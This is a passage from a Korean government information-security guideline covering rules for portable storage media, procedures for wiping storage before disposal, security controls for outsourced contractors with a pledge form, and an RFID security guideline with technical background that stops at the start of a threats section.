[ 별첨 ] 가능합니다. 각급기관구성원은사무실에서업무를수행하는것이원칙입니다. 다만, 업무시간외등업무에지장을주지않는범위내에서불가피하게사적인업무를수행해야할경우가발생하는것이현실입니다. 이와관련, 인터넷뱅킹등에사용하는개인용공인인증서는일반용저장매체에보관관리해야하고, 업무시간외업무에지장을주지않는범위내에서사용이가능합니다. 가급적사무실에서개인용공인인증서사용을지양하시기바랍니다. 관련조항 : 제 9 조 플로피디스켓도계속사용할수있습니다. 플로피디스켓은휴대용저장매체의한종류이므로계속해서사용할수있습니다. 이경우기존에사용하던비밀용플로피디스켓도별지제 2 호서식에따라관리대장에등록해야합니다. 다만, 기술의발전에따라최근출시되는 PC 에는플로피디스켓구동드라이브를지원하지않으므로이를참고하시기바랍니다. 관련조항 : 제 3 조제 1 호, 제 9 조 별도로비치하지않아도됩니다. USB 관리시스템이란 USB 의등록, 반출 입등의현황에대해전자적으로처리하는시스템인만큼꼭수기작성할필요는없고규정에따른적절한전자시스템을구축한다면별지제 5 호서식을제외한여타서식을대체할수있습니다. 관련조항 : 제 3 조제 4 호, 제 4 조제 4 항 - 77 -
자택으로반출이가능합니다. 우선업무용공인인증서는일반용으로등록된휴대용저장매체에보관하여해당기관의사무실에서사용하는것을원칙으로합니다. 다만, 원격근무를위하여자택등에가져가기위해서는반드시관리책임자또는정보보안담당관의보안통제하에해당저장매체에업무용공인인증서외여타업무자료가없는상황에서반출해야합니다. 향후, 사무실로반입시최신백신으로점검후사용하시기바랍니다. 관련조항 : 제 7 조제 5 항, 제 9 조제 2 항 USB 메모리는이지침에규정된보안조치사항을준수하면사용이가능합니다. 별지제 1 호및별지제 2 호서식의관리대당에등록하면누구든사용할수있습니다. 관련조항 : 제 5 조 가능합니다. 다만, 각각의비밀용 USB 메모리를별지제 2 호서식에따라관리대장에등록하여야합니다. 또한비밀이수록된휴대용저장매체는비밀과동일하게비밀관리기록부에등재하고이중캐비닛등에안전하게보관라여야하며, 기존에사용하던플로피디스켓은파기등의방법으로불용처리해야합니다. 관련조항 : 제 5 조, 제 9 조제 3 항, 제 10 조 - 78 -
만들지않아도됩니다. 휴대용저장매체는일반용과비밀용등으로구분되며대외비이상자료를생산하거나보관할필요가있을때해당등급의비밀용휴대용저장매체를만들면됩니다. 관련조항 : 제 9 조제 3 항 혼합저장하면안됩니다. 다른등급의비밀을하나의 USB 메모리에함께저장할수없습니다. 체계적인보안관리등을위해서해당비밀등급의 USB 메모리에관련등급내용만별도보관하여야합니다. 관련조항 : 제 9 조제 3 항 우선관리책임자는즉시정보보안담당관에게통지하여야하며정보보안담당관은해당매체에수록된자료현황을파악하는등의경위조사를실시해야합니다. 또한, 조사결과비밀유출이우려되거나유출된징후가있는경우에는지체없이국가정보원에보안사고조사를의뢰하여야합니다. 최근모부처에서다량의기밀자료를사적으로 USB 메모리에보관하다가적발된사례가있었습니다. 사전에적발되지않고외부로유출되었다면그부처의신뢰와위신은크게흔들렸을것입니다. 관련조항 : 제 7 조제 6 항, 제 8 조제 4 항부터제 6 항 안됩니다. 보안적합성검증을필한 USB 메모리는비인가자의업무자료절취및공무원의 USB 무단사용에따른유출등을억제하기위한수단입니다. 동암호화기능을이용하여암호화된비밀문서를 PC 에보관하거나전산망으로소통하면안됩니다. - 79 -
비밀자료를 PC 에보관하거나전산망으로소통하고자할경우에는국가정보원이개발하여보급한암호장비및자재등국가용보안시스템을사용해야합니다. 관련조항 : 제 4 조제 3 항 가능합니다. 다만, USB 메모리에저장된자료를삭제하거나포맷하여도복구도구를이용하면손쉽게복구할수있으므로비밀용의용도를전환하여사용하고자할경우에는파일삭제및포맷을한후자성소거등의방법으로비밀자료를복원하지못하도록하여야합니다. 또한, 비밀용 USB 메모리를불용처리하고자할경우물리적파기가원칙입니다. PC 의불용처리와관련하여자세한내용은 정보시스템저장매체불용처리지침 ( 부록 6) 을참고하시기바랍니다. 관련조항 : 제 10 조 우선정보보안담당관에게신고해야합니다. 이때취급자는관리책임자에게보고하고관리책임자는소속및감독기관의정보보안담당관에게지체없이신고해야합니다. 비밀자료가저장된경우에는원인 안보위해평가및재발방지등의종합적인대책이필요하므로국가정보원의조사가필요합니다. 따라서, 정보보안담당관은비밀용의분실또는소각사실을통지받거나인지한경우반드시국가정보원장에게그사실을통보하여야합니다. 관련조항 : 제 11 조 우선, 정보보안담당관과상의하시기바랍니다. 비밀용 USB 메모리가고장난경우불용처리가원칙이나, 저장된자료의복구가절실한경우에는소속기관정보보안담당관과협조하여복구용프로그램을이용하거나복구업체를이용할수있 - 80 -
습니다. 다만, 비밀용의복구를외부업체에의뢰하는경우, 정보보안담당관을경유하여국가정보원에통보하는등제반보안조치를먼저강구하여야합니다. 관련조항 : 제 12 조 크기를조절하거나 정 부 란을생략할수있습니다. 모든휴대용저장매체는등록후별지제 5 호서식에따라라벨을기입 표시하여야하므로 USB 의경우에도예외일수없습니다. 다만, 휴대용저장매체의크기를고려하여라벨릐크기를조절하거나 정 부 란의생략도가능합니다. 관련조항 : 제 9 조, < 별지제 5 호서식 > 그렇지않습니다. 휴대용저장매체관리책임자 ( 팀 과장 ) 가직인을날인해도무방합니다. 관리책임자가직인을날인할지또는정보보안담당관이직인을날인할지여부는원칙적으로해당기관의장이결정합니다. 당초, 각급기관의휴대용저장매체는관리책임자 ( 팀 과장 ) 책임하에관리하되, 보안통제를위하여관리책임자요청에의해정보보안담당관이직인을날인토록해왔습니다. 그러나, 관리책임자가휴대용저장매체등록현황사본 1 부를정보보안담당관에게기제출하고있으므로관리책임자가직인을날인해도무방합니다. 관련조항 : 제 7 조제 1 항, 제 8 조제 2 항, < 별지제 5 호서식 > - 81 -
[ 부록 6 ] 정보시스템저장매체불용처리지침 - 82 -
제1조 ( 목적 ) 이지침은 국가정보보안기본지침 제 48조제4항의규정에의하여정보시스템저장매체에수록된자료의삭제방법과세부처리절차를규정함을목적으로한다. 제2조 ( 용어정의 ) 이지침에서사용하는용어의정의는다음각호와같다. 1. 저장매체 라자기저장장치 광저장장치 반도체저장장치등자료기록이가능한전자장치를말한다. 2. 정보시스템 이라함은정보의수집 가공 저장 검색 송신 수신에활용되는전자기기와소프트웨어의조직화된체계를말하며, 저장매체를내장한복사기 팩스등사무용기기를포함한다. 3. 소자 ( 消磁 ) 란저장매체에역자기장을이용해매체의자화값을 0 으로만들어저장자료의복원이불가능하게만드는것을말한다. 4. 완전포맷 이라함은저장매체가전체의자료저장위치에새로운자료 (0 또는 1) 를중복하여저장하는것을말한다. 제3조 ( 정보시스템저장자료보안조치책임 ) 각급기관의장은정보시스템을폐기 양여 교체 반납 ( 이하 불용처리 라한다 ) 하거나외부수리를위하여기관외부로반출할경우저장매체에보관된자료의삭제등보안조치에대한책임을진다. 제4조 ( 정보시스템저장자료삭제 ) 정보시스템저장매체에저장된자료를삭제할경우는다음각호와같다. 1. 정보시스템의사용연한이경과하여폐기또는양여할경우 2. 정보시스템무상보증기간중저장매체또는저장매체를포함한정보시스템을교체할경우 3. 정보시스템의임대기간이만료되어반납할경우 4. 고장수리를위한외부반출등해당기관이정보시스템저장매체를보안통제할수없는환경으로이동이필요한경우 5. 그밖에정보시스템사용자변경등으로저장자료삭제가필요하다고판단되는경우제5조 ( 저장자료삭제책임 ) 1 개인에게지급된정보시스템의저장자료는사용자본인책임하에삭제하여야한다. - 83 -
2 홈페이지등각부서가공통적으로사용하는정보시스템은정보보안담당관책임하에저장자료를삭제하여야한다. 제6조 ( 저장자료삭제방법의지정 ) 1 각급기관은정보보안담당관은첨부 ( 정보시스템저장매체 자료별삭제방법 ) 를준용하여해당기관의실정에맞게정보시스템별저장자료삭제방법을사전지정하여야한다. 2 해당기관내에서정보시스템의사용자가변경된경우, 비밀처리에사용한정보시스템은완전포맷 3회이상, 그외의정보시스템은완전포맷 1회이상으로저장자료를삭제하여야한다. 3 이지침에서정한별표와다른방법으로저장자료를삭제하고자할때에는사전에교육과학기술부장관과협의하여야한다. 제7조 ( 저장자료삭제확인 ) 1 각급기관의정보보안담당관은정보시스템을불용처리할경우사전에저장자료삭제여부를확인하여야한다. 2 정보시스템에저장된자료의삭제를외부업체에의뢰할때에는정보보안담당관이입회하여삭제절차 방법준수여부등을확인감독하여야한다. 제8조 ( 정보시스템도입시보안조치 ) 1 각급기관의정보시스템의도입시고장수리등을위하여공급업체가저장매체를교환 반출해갈경우에대비, 저장자료삭제방법등저장매체보안조치방안을계약서상에포함하여야한다. 2 정보시스템을임차사용할때에는임차기간만료후반납시해당시스템의저장자료삭제방법등저장매체보안조치방안을임차계약서상에포함하여야한다. 제9조 ( 정보시스템외부반출시보안조치 ) 1 불용처리등을위하여정보시스템을외부로반출할경우사전정보보안담당관의통제를받아야하며정보보안담당관은그현황을기록유지하여야한다. 2 각급기관의장은저장매체의고장수리 자료복구등을외부에의뢰할경우저장매체에보관된자료의유출방지를위하여정보보안담당관입회, 수리 복구참여자에대한보안서약서집행 교육등필요한보안조치를하여야한다. 제10조 ( 소자장비등의적합성검증 ) 각급기관의장은정보시스템의저장자료를삭제하는장비나소프트웨어를도입할경우사전국가정보원에제품성능에대한보안적합성검증을의뢰하여야한다. 제11조 ( 휴대용저장매체의분실, 소각시대처방안 ) 각급기관의장은국가정보원과긴밀히협의하여정보시스템에저장된자료의삭제방법 절차등을지속개선하여야한다. - 84 -
< 첨부 > 정보시스템저장매체ㆍ자료별삭제방법 가 : 완전파괴 ( 소각ㆍ파쇄ㆍ용해 ), 나 : 전용消磁장비이용저장자료삭제 다 : 완전포맷 3 회수행,. 라 : 완전포맷 1 회수행 - 85 -
[ 부록 7 ] 외부용역업체보안관리방안 - 86 -
외부용역사업계획단계부터완료시까지보안관리방안 * 2010.10.22 부터용역업체가정보누출적발시 국가계약법 시행령제76조에근거, 해당업체를부정당업자로등록, 입찰참가자격제한등제재조치가능 1. 용역사업입찰시 o 중요외주용역사업은착수단계부터적정등급의비밀또는대외비로분류, 하고 대외주의 ㆍ 요보안 등모호한표현사용금지 용역의뢰 o 입찰공고이전에투입이예상되는자료ㆍ장비가운데보안관리가필요한사항에대하여관련법규에따라등급을분류하고필요한보안요구기준을마련 o 입찰공고시에기관이자체작성한 누출금지대상정보, 부정당업자제재조치, 기밀유지의무및위반시불이익등을정확히공지 o 제안서평가요소에자료ㆍ장비ㆍ네트워크보안대책및 누출금지대상정보 관리방안등보안관리계획의평가항목및배점기준마련 o 업체가입찰제안서에제시한용역사업전반에대한보안관리계획이타당한지를검토하여사업자선정시이를반영 o 웹호스팅등정보시스템을위탁운영시에는해킹에대비해웹방화벽등보안시스템구비여부와단순운영이외보안관리가가능한지여부를심층검토 2. 용역사업계약시 o 용역사업에투입되는자료ㆍ장비등에대한대외보안이필요한경우보안의범위ㆍ책임을명확히하기위해사업수행계약서와별도로비밀유지계약서작성 o 비밀유지계약서에는비밀정보의범위, 보안준수사항, 위반시손해배상책임, 지적재산권문제, 자료의반환등이포함되도록명시 o 용역사업참여인원은용역업체임의로교체할수없도록명시하고신상변동 ( 해외여행 - 87 -
포함 ) 사항발생시발주기관에즉시보고 o 발주기관의요구사항을사업자에게명확히전달키위해작성하는과업지시서ㆍ계약서 ( 입찰공고포함 ) 에인원ㆍ장비ㆍ자료등에대한보안조치사항과 누출금지대상정보 및 부정당업자의제재조치 를정확히기술 * 누출금지대상정보작성시 교육과학기술부정보보안기본지침 제57 조 ( 용역사업보안관리 ) 참조 o 용역업체가사업에대한하도급계약을체결할경우본사업계약수준의비밀유지조항을포함토록조치 3. 용역사업수행시 참여인원에대한보안관리 o 용역사업참여인원에대해서는 정보누출 금지조항및개인의친필서명이들어간보안서약서징구 o 용역사업수행전참여인원에대해법적또는발주기관규정에의한비밀유지의무준수및위반시처벌내용등에대한보안교육실시 * 누출금지대상정보및정보누출시부정당업자제재조치등에대한교육병행 o 발주기관은사업수행중업체인력에대한보안점검실시, 누출금지대상정보 외부누출여부확인 o 비밀관련사업을수행할경우참여인원에대한비밀취급인가등보안조치를수행하고국가정보원장에게보안측정을요청 자료에대한보안관리 o 계약서등에명시한누출금지대상정보를업체에제공할경우자료관리대장을작성, 인계자ㆍ인수자가직접서명한후제공하고사업완료시관련자료회수 o 용역사업관련자료및사업과정에서생산된모든산출물은발주기관의파일서버에저장하거나보안담당관이지정한 PC에저장ㆍ관리 o 용역사업관련자료는인터넷웹하드ㆍ P2P 등인터넷자료공유사이트및개인메일함에저장을금지하고용역발주기관과용역업체간전자우편을이용해자료전송이필요한경우에는자체전자우편을이용, 첨부자료암호화후수 발신 - 88 -
* 다만, 대외비이상의비밀은전자우편으로수 발신금지 o 발주기관이제공한사무실에서사업을수행할경우제공한비공개자료는매일퇴근시반납토록하며비밀문서를제외한일반문서는용역업체에제공된사무실에시건장치가된보관함이있을경우이에보관가능 o 용역사업수행으로생산되는산출물및기록은보안담당관이인가하지않은비인가자에게제공ㆍ대여ㆍ열람을금지 사무실ㆍ장비에대한보안관리 o 용역사업수행장소는발주기관내시건장치와통제가가능한공간을제공하거나 CCTVㆍ시건장치등비인가자출입통제대책이마련된외부사무실을사용 o 용역업체사무실또는용역업무를수행하는공간에대한보안점검을정기적으로실시하고필요시국가정보원에지원을요청 o 발주기관내부에서용역사업을수행할경우용역참여직원이노트북등관련장비를외부에반출ㆍ입시마다악성코드감염여부및자료무단반출여부확인 o 인가받지않은 USB 등의휴대용저장매체사용을금지하며산출물저장을위해휴대용저장매체가필요한경우발주기관의승인하에사용 내ㆍ외부망접근시보안관리 o 용역업체사용전산망은방화벽등을활용하여해당기관업무망과분리구성하고업무상필요한서버에만제한적접근허용 o 용역사업수행시발주기관전산망이용이필요한경우 - 사업참여인원에대한사용자계정 (ID) 은하나의그룹으로등록하고계정별로정보시스템접근권한을차등부여하되기관내부문서접근금지 - 계정별로부여된접속권한은불필요시곧바로권한을해지하거나계정을폐기 - 참여인원에게부여한패스워드는보안담당관이별도로기록관리하고수시로해당계정에접속하여저장된자료와작업이력확인 - 보안담당관은서버및장비운영자로하여금내부서버및네트워크장비에대한접근기록을매일확인하여이상유무보고 - 89 -
o 용역업체에서사용하는 PC는인터넷연결을금지하되, 사업수행상연결이필요한경우에는발주기관의보안통제하에제한적허용 o 발주기관및용역업체전산망에서 P2P, 웹하드등인터넷자료공유사이트로의접속을방화벽등을이용해원천차단 4. 사업완료시 o 사업완료후생산되는최종산출물중대외보안이요구되는자료는대외비로작성ㆍ관리하고불필요한자료는삭제및세단후폐기 o 용역업체에제공한제반자료, 장비, 서류와중간ㆍ최종산출물등용역과관련된제반자료는전량회수하고업체에복사본등별도보관금지 o 사업완료후업체소유 PCㆍ서버의하드디스크ㆍ휴대용저장매체등전자기록저장매체는국가정보원장이안전성을검증한삭제 S/W로완전삭제후반출 * 정보시스템저장매체불용처리지침 ( 부록 6) 참조 o 용역사업관련자료회수및삭제조치후업체에게복사본등용역사업관련자료를보유하고있지않다는대표명의확약서징구 5. 기타 o 정보누출적발시 국가계약법 시행령제76조에의거, 지체없이부정당업자제재조치를실시하고관련사항국가정보원에통보 * 타기관의비공개정보소유사실을적발했을경우해당기관및국가정보원에관련사실통보 - 90 -
< 별첨 > 보안서약서 본인은년월일부로관련용역사업 ( 업무 ) 을수행함에있어다음사항을준수할것을엄숙히서약합니다. 1. 본인은관련업무중알게될일체의내용이직무상기밀사항임을인정한다. 2. 본인은이기밀을누설함이국가안전보장및국가이익에위해가될수있음을인식하여업무수행중지득한제반기밀사항을일체누설하거나공개하지아니한다. 3. 본인이이기밀을누설하거나관계규정을위반한때에는관련법령및계약에따라어떠한처벌및불이익도감수한다. 4. 본인은하도급업체를통한사업수행시하도급업체로인해발생하는위반사항에대하여모든책임을부담한다. 년월일 서약자 업 체 명 : ( 업체대표 ) 직 위 : 성 명 : ( 서명 ) 주민등록번호 : 서약집행자 소 속 : ( 담당공무원 ) 직 위 : 성 명 : ( 서명 ) 주민등록번호 : - 91 -
[ 부록 8 ] RFID 보안관리지침 - 92 -
제1장총칙제1조 ( 목적 ) 이지침은 정보보안기본지침 제 51조제4 항에따라 RFID 시스템의구축 운영등과관련하여필요한세부보안관리사항을규정함을목적으로한다. 제2조 ( 적용범위 ) 이지침은교육과학기술부와그소속 산하기관, 시 도교육청과그소속 산하기관, 공공기관, 대학 ( 이하 각급기관 이라한다 ) 에적용한다. 제3조 ( 적용대상 ) 이지침은다음각호의사항에대하여적용한다. 1. 각급기관이 RFID 시스템을구축 운영하면서기밀등중요자료를소통하고자할경우 2. 그밖에보호할필요가있는정보를소통하고자할경우제4조 ( 정의 ) 이지침에서사용하는용어의정의는다음과같다. 1. RFID(Radio Frequency IDentification) 시스템 이라함은대상이되는사물등에 RFID 태그를부착하고전파를사용, 해당사물등의식별정보및주변환경정보를인식하여각사물등의정보를수집 저장 가공및활용하는시스템을말한다. 2. RFID 태그 ( 이하 태그 라한다 ) 라함은사물등에내장또는부착되어해당사물에관한정보또는그밖의정보를기록하고전파를이용하여이들정보를송 수신하는장치를말한다. 3. RFID 리더기 ( 이하 리더기 라한다 ) 라함은태그의정보를활용하기위해태그와송 수신하거나태그에서수집된정보를백엔드시스템으로전송하는장치를말한다. 4. 백엔드시스템 이라함은리더기로부터받은정보의처리를담당하기위한 DB서버등관련시스템을말한다. 제2장보안대책의수립제5조 ( 관리적보안대책 ) 1 각급기관의장은 RFID 시스템보안관리책임자 ( 이하 보안관리책임자 라한다 ) 를지정운영하고시스템관리자및사용자에대한보안교육을실시하여야한다. 2 보안관리책임자는 RFID 시스템구축 운영을외부업체에의뢰할경우에는사업수행과 - 93 -
관련된인원에대한보안서약서징구등보안조치를하여야한다. 3 각급기관의장은 RFID 시스템의분실 탈취에대비하여백업등보안대책을강구하여야한다. 제6조 ( 물리적보안대책 ) 1 보안관리책임자는태그의발급기 리더기등 RFID 시스템에대한비인가자의접근통제대책을마련하여야한다. 2 보안관리책임자는인가자만이태그를발급 변경 폐기하고이력관리기능을구비하도록대책을강구하여야한다. 제7조 ( 기술적보안대책 ) 1 각급기관의장은태그에저장 처리되는정보가해킹등을통해외부에유출되더라도피해를줄일수있도록태그정보를최소화하여야한다. 2 제1항에도불구하고, 각급기관의장은기밀등중요정보를소통할경우에는관련시스템에국가정보원장이안정성을확인한인증, 암호화등보안기술을구현하여야한다. 3 각급기관의장은리더기및백엔드시스템에서처리되는정보를보호하기위해국가정보원장이안정성을확인한보안기술을적용하여야한다. 제3장보안대책의시행제8조 ( 사업계획단계 ) 1 각급기관의장은 RFID 사업담당자 ( 이하 사업담당자 라한다 ) 와보안관리책임자를지정운영하는등사업수행체계를마련하여야한다. 2 사업담당자는보안관리책임자와협의하여사업계획서에소통정보를정의하고이를보호할수있는보안대책을마련하여사업을추진하여야한다. 3 각급기관의장은제5조부터제7조까지에따라 RFID 보안관리실무매뉴얼 ( 부록 8-1) 을참조하여자체보안대책을강구한후, 이를바탕으로국가정보원장과사전협의하여제13 조에따라보안성검토를의뢰하여야한다. 4 각급기관의장은사업수행업체를선정할경우제시된보안대책을구현할수있는지를검토하고필요시국가정보원장에게자문을요구할수있다. 제9조 ( 사업설계단계 ) 1 보안관리책임자는사업수행업체를대상으로사업수행과관련하여취득한내부정보를유출하지않도록보안서약서징구, 보안교육등을실시하여야한다. 2 보안관리책임자는네트워크 시스템보안, 자료보안, 응용프로그램보안등사업수행업체의보안아키텍쳐설계내용이보안성검토결과와부합하는지를확인하여야한다. 3 보안관리책임자는보안아키텍쳐개발사안에대한테스트계획을수립하여야한다. - 94 -
제10조 ( 사업구축단계 ) 1 각급기관의장은국가정보원장이승인한암호논리나정보보호시스템등을도입하며안정성이확인된네트워크를구축하여야한다. 2 보안관리책임자는시스템운영계획에따른평시보안관리 교육 백업계획등을수립하고관련운영 보안관리지침을마련하여야한다. 제11조 ( 테스트및이행단계 ) 1 보안관리책임자는수립된계획에따라 RFID 시스템구성요소별로세부보안취약점을점검하여야한다. 2 보안관리책임자는모의침투테스트를수행한다. 3 각급기관의장은제1항및제2항과관련하여국가정보원장에게안전측정을의뢰할수있다. 제12조 ( 운영및유지관리단계 ) 1 보안관리책임자는 RFID 시스템운영과관련하여수립된보안대책의적정성을지속적으로검토 보완하여야한다. 2 각급기관의장은 RFID 시스템의일부또는전체를변경하는경우에는국가정보원장과사전협의하여보안성검토를의뢰하여야한다. 3 보안관리책임자는 RFID 시스템의안정성을확보하기위하여관련인원에대해주기적인보안교육및훈련등을실시하여야한다. 4 각급기관의장은자체적으로 RFID 시스템관련취약점을점검하고보안감사를실시하여야하며필요시국가정보원장에게안전측정을의뢰할수있다. 제4장보안성검토및안전측정제13조 ( 보안성검토 ) 1 각급기관의장은 RFID 시스템을구축 운영하면서기밀등중요정보나보호할필요가있는정보를소통하고자할경우에는국가정보원장과사전협의를거쳐보안성검토를의뢰하여야한다. 2 보안성검토의뢰절차는다음과같다. 1. 각급기관의장은제8조의사업계획단계에서보안대책을강구한후자체보안심사위원회의심의 의결을거친다. 2. 보안대책의적절성을판단하기곤란한경우에는국가정보원장과사전협의할수있다. 3. 자체보안심사위원회에서의결된내용을바탕으로사업계획단계 ( 사업공고전 ) 에서국 - 95 -
가정보원장에게보안성검토를의뢰한다. 4. 교육과학기술부및시 도교육청은국가정보원본부에직접보안성검토를요청하고그밖의각급기관은관계교육과학기술부장관및시 도교육감을경유하여보안성검토를요청한다. 3 보안성검토와관련한그밖의사항에대해서는 정보보안기본지침 제68조 ( 보안성검토신청 ) 부터제77조 ( 무단변경및오용금지 ) 를준용한다. 제14조 ( 안전측정 ) 1 각급기관의장은 RFID 시스템의보안취약점을진단하기위하여국가정보원장에게안전측정을의뢰할수있다. 2 안전측정을의뢰할수있는경우는다음과같다. 1. RFID 시스템을구축또는변경할경우 2. RFID 시스템과관련한보안취약점점검을수행할경우 3. 그밖에각급기관의장이자체적으로필요하다고판단하는경우 - 96 -
[ 부록 8-1 ] RFID 보안관리방안 - 97 -
1. RFID 시스템개요 1-1. 정의 1 "RFID(Radio Frequency IDentification) 시스템 " 이라함은대상이되는사물등에 RFID 태그를부착하고전파를사용하여해당사물등의식별정보및주변환경정보를인식하여각사물등의정보를수집 저장 가공및활용하는시스템을말한다. 2 RFID 시스템은정보를저장하거나처리하는태그와전파를이용하여태그정보를송 수신하는리더기및리더기로부터정보를관리하는백엔드시스템으로구성된다. 3 RFID 기술은상품 동물을비롯해일반적인물체의자동인식및추적을위해사용되며기존광학기술기반의식별방식인바코드에비해다음과같은장점이있다. - 인식속도가 0.01 ~ 0.1초장도로바코드에비해빠르다. - 수십 m의원거리에서도인식이가능하다. - 99.9% 이상의높은인식률을갖는다. - 대용량정보저장이가능하고재기록이용이하다. - 패스워드등보안기술적용이가능하다. 1-2. 구성요소 가. RFID 태그 1 "RFID 태그 1) "( 이하 태그 라한다 ) 라함은사물에내장또는부착되어해당사물등에관한정보를가록또는처리하고전파를이용하여이들정보를송 수신하는장치를말한다. 2 태그는정보를저장 처리하기위한하나의마이크로칩 (IC Chip) 과정보를전송하기위한안테나로구성된다. 태그를결정하는주요요소는식별자, 전원공급방식, 동작주파수등이다. 1) RFID 트랜스폰더 (Transponder) 로불리기도한다. - 98 -
[RFID 태그구성도 ] [RFID 식별자 ] 모든 RFID 태그는고유식별자를가지고있다. 주로사용되는 EPCglobal 2) 의전자상품코드 (EPC:Electronic Product Code) 는헤더, 기관명, 상품분류, 일련번호등네개의요소로구성된다. 0 1. 0 0 0 A 8 9. 0 0 0 1 6 F. 0 0 1 6 9 D C 0 헤드기관명상품분류일련번호 [ 전원공급방식 ] 태그의전원공급방식에따라능동형과수동형으로분류할수있다. - 능동형태그 (Active Tag) 는자체전원장치를가지고있으며메모리와계산능력을갖추고있어원거리통신이가능하다. 항만물류컨테이너추적등에주로시용된다. - 수동형태그 (Passive Tag) 는자체전원장치가없는태그로 RFID 리더기가보내는전파로부터전원을공급받아동작하는태그이다. 통신거리가짧으나소형, 저가로다양한분야에서널리쓰이는태그이다. [ 동작주파수별 RFID 태그 ] 동작주파수대역에따른태그의종류는대략 5가지정도로분류된다. 2) 미 MIT 공대에서전자태그를연구하던 AutoID 센터를중심으로구성된비영리기구이다. - 99 -
1 저주파대역 RFID 태그 - 태그사용주파수 : 125KHz, 134KHz - 인식거리 : 60cm 이하 - 동작방식 : 수동형 - 특징 : 액체등비금속장애물투과성우수 - 주요사용분야 : 출입통제, 동물관리 - 보안기능 : 태그정보쓰기금지 2 고주파대역 RFID 태그 ( 비접촉식스마트카드포함 ) - 태그사용주파수 : 13.56MHz - 인식거리 : 60cm 이하 - 동작방식 3) : 수동형 - 특징 : 액체등비금속장애물투과성우수 - 주요사용분야 : 출입통제, 도서관리, 전자지불 - 보안기능 : 리더기인증, 전송정보의암호화 3 극초단파대역능동형 RFID 태그 - 태그사용주파수 : 433MHz - 인식거리 : 50 ~ 100m 이하 - 동작방식 : 능동형 - 특징 : 대형물류관리에사용 - 주요사용분야 : 항만물류 - 보안기능 : 리더기인증, 전송정보의암호화 4 극초단파대역수동형 RFID 태그 - 태그사용주파수 : 908.5 ~ 914MHz 4) - 인식거리 : 3.5 ~ 10m 이하 - 동작방식 5) : 수동형 - 특징 : 저가, 금속 액체투과성낮음 - 주요사용분야 : 유통 물류관리 - 보안기능 : 태그정보소거 6), 접근 잠금패스워드 3) 능동형태그도부분적으로사용되고있다. 4) 국제주파수대역은 860~960MHz 이나국내에서는 908.5~914MHz 대역을채택하고있다. - 100 -
5 마이크로파대역 RFID 태그 - 태그사용주파수 : 2.56GHz - 인식거리 : 1 ~ 10m 이하 - 동작방식 : 능동형또는수동형 - 특징 : 고가 - 주요사용분야 : 지폐 상품권, 고가품 - 보안기능 : 태그정보쓰기금지또는잠금기능등나. RFID 리더기 1 "RFID 리더기 7) "( 이하 리더기 라한다 ) 라함은태그의정보를활용하기위해태그와송 수신하거나태그에서수집된정보를백엔드시스템으로전송하는장치를말한다. 2 리더기는수동형태그에통신신호를통해전원을공급하고정보를교환한다. 또한능동형태그가주기적으로보내는신호를처리하여정보를전송한다. [ 리더기분류 ] 리더기는설치방식에따라특정장소에고정시키는고정형과휴대하여사용할수있는이동형으로분류할수있다. 1 고정형리더기 - 출입통제, 대형물류관리등에사용 - 일반적으로백엔드시스템과유선네트워크로연결 - 보안대책 : 유선네트워크보안대책과동일 [ 고정형리더기예시 ] 5) 능동형태그도부분적으로사용되고있다. 6) 일반적으로 Kill 명령어를사용하여태그정보를영구적으로소거하는것을말한다.(4-1 참조 ) 7) RFID Interrogator 로불리기도한다. - 101 -
2 이동형리더기 - 소형물류관리, 도서관리, 전자지불용도등으로사용 - 전용리더기외에 PDA, 휴대폰 8) 등도활용가능 - 일반적으로백엔드시스템과무선네트워크로연결 - 보안대책 : 무선네트워크보안대책과동일 [ 이동형리더기예시 ] [ 태그와리더기간통신 ] 태그와리더기는다음두가지방법으로통신을개시한다. - 리더기가먼저신호를보내는방식 (ITF, Interrogators Talk First) 으로신호를수신한태그가이에응답함으로써통신이이루어진다. 대부분의수동형태그가이통신방식을이용한다. - 태그가먼저신호를보내는방식 (TTF, Tag Talk First) 으로신호를받은처리기는태그의존재를알수있다. 대부분의능동형태그가이방식을사용한다. 수동형태그에도적용할수있는데이경우에는리더기로부터전원을공급받은후신호를보낼수있다. TTF방식은태그가인증되지않은리더기에도신호를보내게되어보안에취약할수있다. 8) 휴대폰 PDA 등에리더기기능을포함한것을모바일 RFID 라한다. - 102 -
다. 백엔드시스템 " 백엔드시스템 " 이라함은리더기로부터받은정보의처리를담당하기위한 DB서버등관련시스템을말하며미들웨어, 데이터베이스, 데이터처리서버, 웹서버등이있는데, 사업의규모및특성에따라단독서버, 복수의백엔드시스템등다양하게구성할수있다. 1 미들웨어는리더기로부터태그정보를수집및필터링하는역할을담당한다. 2 데이터베이스는태그식별자에해당되는상품정보, 인증및암호통신을위한키등을저장한다. 3 데이터처리서버는데이터베이스정보들을응용환경에적합하도록저장 가공하는프로그램을탑재한다. 4 웹서버는외부응용프로그램에데이터를전달해주는역할을수행한다. [ 백엔드시스템예시 ] 1-3. 국제표준동향 RFID 시스템의호환성을위하여국제표준기구 (ISO 9) /IEC 10) ) 와 EPCglobal 등에 9) International Standardization Organization 의약자로국제표준화기구를뜻한다. 10) International Electronic Committee 의약자로국제전기기술위원회를뜻한다. - 103 -
서국제및산업계표준화를주도하고있다. ISO/IEC 국제표준현황 표준분야 표준번호 내 용 비 고 명령어 데이터 15961 명령어형식 리더기 백엔드 형식 15962 데이터형식 리더기정보대상 고유식별자 15693 UID 11) 형식 태그대상 18000-1 18000시리즈용어 용어정의규정 18000-2 134KHz 이하 RFID 동 식물관리 무선통신방식 18000-3 13.56MHz RFID 도서관리 18000-4 2.45GHz RFID 진품확인 18000-6 860 ~ 960MHz RFID 물류유통 18000-7 433MHz RFID 항만물류 응용요구사항 TR 180001 응용 S/W 요구사항 RFID 응용대상 스마트카드 14443 15693 비접촉식카드 근접카드 1 ISO/IEC 에서제시한표준중 14443, 15693 과 18000-2 3 4 는단순잠금기능 12) 만있다. 18000-7 은잠금패스워드설정이가능하고 18000-6 은태그정보 소거, 잠금 접근패스워드 13) 설정까지가능하다. ISO/IEC 14443, 15693 은스마트카드국제표준으로암호논리를탑재할수있다. 2 EPCglobal 은산업계표준으로 Class 0 1 2 가있으며주로사용되는규격은 Calss1Gen2 14) 이다. 여기에는태그정보소거, 잠금 접근패스워드설정의보 안기능이있다. 따라서, 소통정보를보호하기위해서는 ISO/IEC 18000-6 또는 EPCglobal Class1Gen2 규격의태그를사용할것을권장한다. 2. RFID 보안위협 2-1. 보안위협유형 가. 정보추출 복제 11) Unique IDentification 의약자로구체적인정보를입력하지않고각각의정보를식별할수있 는고유번호를부여하는코드체계이다. 12) 리더기에서태그에 Lock 명령어를전송하여태그의읽기 